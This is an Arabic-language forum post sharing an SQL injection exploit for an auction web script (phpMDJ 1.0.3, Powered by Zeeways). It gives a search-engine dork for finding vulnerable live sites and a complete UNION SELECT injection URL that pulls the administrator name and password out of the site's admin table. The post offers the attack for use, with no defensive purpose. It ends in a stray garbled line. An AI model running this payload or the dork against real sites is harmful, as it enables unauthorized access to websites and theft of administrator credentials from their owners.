السلام عليكم ورحمة الله وبركاته
جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
كود PHP:
Dork : [ inurl:"product_desc.php?id=" Powered by Zeeways.com ]
طريقة الإستغلال
كود PHP:
http://server/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
الثغرة من إكتشاف الأخ SyRiAn_34G13
إن شاء الله تستفيدوا
موفقين بإذن الله ...
eyvm td ZeeWays Script